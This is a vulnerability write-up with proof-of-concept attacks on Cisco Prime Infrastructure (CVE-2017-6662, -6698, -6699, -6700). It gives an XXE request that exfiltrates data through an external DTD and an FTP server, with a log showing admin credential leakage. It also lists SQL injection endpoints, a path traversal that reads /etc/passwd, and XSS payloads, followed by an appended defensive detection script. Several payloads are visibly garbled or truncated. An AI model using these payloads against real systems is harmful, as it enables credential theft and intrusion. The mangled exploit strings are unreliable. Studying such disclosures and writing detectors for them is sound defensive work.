
CiscoPrimeInfrastructure_XXE_SQLI: a basketful of vulnerabilities

Vulnerability description:
       Cisco Prime Infrastructure has multiple vulnerabilities, including XXE (XML external entity) injection and SQL injection.

Affected versions:
v1.1~v3.1.6

POC:
       1. XXE (CVE-2017-6662)
        Log in as a low-privileged user, choose "Settings" - "Export", select the "PDF" format and click "Export". Tick the "Chart" option; that option uses XML to generate the image in SVG format.
POST /webacs/prime/ui/dashboard/renderer HTTP/1.1
Host: 127.0.0.1
[...]

output-type=pdf&content={"applicationName":"sectest","reportName":"Site","options":{},"timezoneOffset":0,"items":[{"options":{"filters":[],"additionalInfo":[""]},"svgSurface":{"svg":"<%3fxml+version%3d\"1.0\"+encoding%3d\"UTF-8\"%3f>
x [
\"http://:1234/sectest.dtd\">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]>%26%65%78%66%69%6c%3b","dims"%3a{"width"%3a0,"height"%3a0}},"csv"%3a"Devices,\"","title"%3a"","timestamp"%3a""}],"noBrandingData"%3atrue,"locale"%3a"en"}&pdfOptions=%7B%22table%22%3Atrue%2C%22chart%22%3Atrue%7D

$ cat sectest.dtd
:2121/%data;'>">

$ python -m SimpleHTTPServer 1234
$ wget https://raw.githubusercontent.com/ONsec-Lab/scripts/master/xxe-ftp-server.rb
$ ruby xxe-ftp-server.rb
FTP. New client connected
< USER anonymous
< PASS Java1.8.0_66@
> 230 more data please!
< TYPE I
> 230 more data please!
< CWD !
> 230 more data please!
< hostname
[...]
< !
> 230 more data please!
< username admin password hash
> 230 more data please!
< CWD  role admin
> 230 more data please!
< !
[...]
        2. SQLi (CVE-2017-6698)
        A low-privileged user can exploit the SQL injection vulnerabilities to obtain the administrator password.
https://127.0.0.1/webacs/rs/wap/preference/value/@@me/PI_RECENT_LINKS?categoryPath=global%2fPI_RECENT_LINKS
https://127.0.0.1/webacs/rs/wap/preference/value/@@me/syslog_viewer_tutorial?categoryPath=
https://127.0.0.1/webacs/rs/device-rest/getfiltercriteria/device?start=0&count=100&id=&path=%2Froot
          Injection points that require administrator privileges:
https://127.0.0.1/webacs/rs/wap/preference/value/@@me/PI_HOME_PAGE_SELECTION?categoryPath=
https://127.0.0.1/webacs/rs/wap/preference/value/@@me/corelated-right-tabs?categoryPath=
https://127.0.0.1/webacs/rs/wap/preference/value/@@me/DASHBOARD_CONFIG:com_cisco_xmp_web_page_smartlicense_dashboard?categoryPath=

https://127.0.0.1/webacs/rs/json/userService/getAuditRecordsForGivenRange/?userName=/&ipAddress=/&time=/&auditDescription=/&userGroup=/&activeDomain=/
https://127.0.0.1/webacs/inventoryRestService/ifm/inventory-rest/getImportTaskStatusDTO/
https://127.0.0.1/webacs/rs/json/jobSchedulerService/getJobDetails/
https://127.0.0.1/webacs/rs/json/jobSchedulerService/getAllJobsCtr/Infrastructure/
https://127.0.0.1/webacs/rs/json/jobSchedulerService/getAllJobs//Lightweight%20AP%20Operational%20Status
        Injection points inside the JSON body:
https://127.0.0.1/webacs/rs/preferences/systemPreferencesForNode/default.proxy/
(HTTP POST)
{
    "items": [
        "",
        "ProxyPort",
        "ProxyUserName",
        "ProxyPassword",
        "isProxyEnabled",
        "isProxyAuthenticated"
    ]
}

https:///webacs/rs/preferences/systemPreferencesForNode/default.swim/
(HTTP POST)
{
    "items": [
        "",
        "CCOPassword"
    ]
}


        3. Arbitrary file read / local file inclusion
         https://127.0.0.1/webacs/packetCaptureAction.do?command=download&filename=../../../../../../../../../../../../../../../../../../../../etc/passwd
GET /webacs/packetCaptureAction.do?command=download&filename=../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1

HTTP/1.1 200 OK
Cache-Control: private
Expires: Thu, 01 Jan 1970 01:00:00 CET
Content-Disposition: attachement; filename="../../../../../../../../../../../../../../../../../../../../etc/passwd.zip"
Content-Type: application/zip
        4. XSS
        a) Reflected XSS (CVE-2017-6699)
           https://127.0.0.1/webacs/applications/common/jsp/SystemPreferences_Configurable.jsp?taskName=&confUrl=
ipT>https://127.0.0.1/webacs/applications/inventory/html/ImportJobResults.jsp?taskId=
ript>&jobResultPageId='>
        b) DOM-based XSS (CVE-2017-6700)
https://127.0.0.1/webacs/index_abs.jsp?theme=prime#pageId=com_cisco_ifm_ui_web_page_job_dashboard_import_view&taskId=&jobName=">src=x onerror=alert(/XSS/)>&pageSettings=
https://127.0.0.1/webacs/loginAction.do?action=login&product=wcs&selectedCategory=en#pageId=com_cisco_ifm_ui_web_page_job_dashboard_detail_view&forceLoad=true&jobType=Infrastructure&workState=Scheduled&parentType=usrDefined&lastRunJobId=&lastRunResultState=Success&jobId=&jobName=Mobility Service Status&jobBreadcrumName=">
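As an added defender-side example (not part of the original post and not Cisco's code), the following script flags requests to the endpoints named above that carry the write-up's three indicator patterns: a `..` traversal in the packet-capture download filename, a DOCTYPE declaration inside the PDF-export SVG body, and HTML markup in a job/page parameter. The endpoint paths come from the page; the label names, the sample requests and the `example.invalid` host are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Endpoint paths are the ones listed in the write-up; labels are ours.
TRAVERSAL_DOWNLOAD = "/webacs/packetCaptureAction.do"
SVG_RENDERER = "/webacs/prime/ui/dashboard/renderer"
XSS_SINKS = ("/webacs/index_abs.jsp", "/webacs/loginAction.do",
             "/webacs/applications/inventory/html/ImportJobResults.jsp",
             "/webacs/applications/common/jsp/SystemPreferences_Configurable.jsp")
MARKUP_RE = re.compile(r"<\s*\w|\bon\w+\s*=", re.IGNORECASE)   # a tag start or an event handler
DTD_RE = re.compile(r"<!DOCTYPE|<!ENTITY", re.IGNORECASE)       # the export's SVG never needs a DTD

def detect_indicators(method, url, body=""):
    """Return the set of indicator labels matching one request (empty set if clean)."""
    parts = urlsplit(url)
    hits = set()
    # Decode query and fragment parameters; a second unquote catches double-encoding.
    # The fragment only exists client-side, so for the DOM XSS case this works on URLs
    # captured from the browser or proxy, not from the server access log.
    params = {}
    for segment in (parts.query, parts.fragment):
        for key, vals in parse_qs(segment, keep_blank_values=True).items():
            params[key] = [unquote_plus(v) for v in vals]
    if parts.path == TRAVERSAL_DOWNLOAD:
        if any(".." in f or f.startswith("/") for f in params.get("filename", [])):
            hits.add("packet-capture-path-traversal")
    if method == "POST" and parts.path == SVG_RENDERER and DTD_RE.search(unquote_plus(body)):
        hits.add("svg-doctype-in-export")
    if parts.path in XSS_SINKS:
        if any(MARKUP_RE.search(v) for vals in params.values() for v in vals):
            hits.add("markup-in-job-parameter")
    return hits

# Constructed sample requests modelled on the write-up (one malicious, one benign per case).
SAMPLE_REQUESTS = [
    ("GET", "/webacs/packetCaptureAction.do?command=download&filename=../../../../etc/passwd", ""),
    ("GET", "/webacs/packetCaptureAction.do?command=download&filename=capture1.pcap", ""),
    ("POST", "/webacs/prime/ui/dashboard/renderer",
     'output-type=pdf&content={"svgSurface":{"svg":"<%3fxml+version%3d%221.0%22%3f>'
     '<!DOCTYPE+x+SYSTEM+%22http://example.invalid/x.dtd%22><svg/>"}}'),
    ("POST", "/webacs/prime/ui/dashboard/renderer",
     'output-type=pdf&content={"svgSurface":{"svg":"<%3fxml+version%3d%221.0%22%3f><svg/>"}}'),
    ("GET", "/webacs/index_abs.jsp?theme=prime#pageId=x&jobName=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E", ""),
    ("GET", "/webacs/index_abs.jsp?theme=prime#pageId=x&jobName=Mobility+Service+Status", ""),
]

def scan(requests=SAMPLE_REQUESTS):
    """Classify every request; returns [(url, sorted labels), ...]."""
    return [(url, sorted(detect_indicators(m, url, b))) for m, url, b in requests]
```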




TIPS:
       CVE-2017-6662, CVE-2017-6698, CVE-2017-6699, CVE-2017-6700

REF:
       https://packetstormsecurity.com/files/143111/Cisco-Prime-Infrastructure-3.1.6-XXE-Injection-XSS-LFD-SQL-Injection.html
